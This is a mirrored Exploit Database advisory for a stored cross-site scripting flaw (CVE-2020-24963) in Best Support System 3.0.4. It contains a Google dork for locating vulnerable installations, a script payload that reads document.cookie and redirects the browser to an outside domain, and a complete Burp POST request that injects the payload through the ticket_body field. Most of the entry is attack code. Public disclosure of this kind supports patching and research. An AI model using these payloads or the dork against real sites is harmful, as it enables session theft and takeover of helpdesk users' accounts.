Best Support System 3.0.4 – ‘ticket_body’ Persistent XSS (Authenticated)

• Exploit Database
• 115 阅读

• 作者： Ex.Mi
  日期： 2020-11-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49122/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38

  # Exploit Title: Best Support System 3.0.4 - &apos;ticket_body&apos; Persistent XSS (Authenticated) # Google Dork: "Powered By Best Support System" # Date: 2020-08-23 # Exploit Author: Ex.Mi [ https://ex-mi.ru ] # Vendor: Appsbd [ https://appsbd.com ] # Software Version: 3.0.4 # Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317 # Tested on: Kali Linux # CVE: CVE-2020-24963 # CWE: CWE-79     [i] :: Info:   An Authenticated Persistent XSS vulnerability was discovered in the Best Support System, tested version — v3.0.4.     [$] :: Payloads:   13"-->">&apos;<code> -- </code><!--<img src="https://www.exploit-db.com/exploits/49122/--><img src=x onerror=(alert)(<code>Ex.Mi</code>);(alert)(document.cookie);location=<code>https://ex-mi.ru</code>;>     [!] :: PoC (Burp Suite POST request):   POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 350 Origin: https://localhost Connection: close Referer: https://localhost/support-system/ticket/details/11.html Cookie: [cookies_here]   app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B&apos;%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2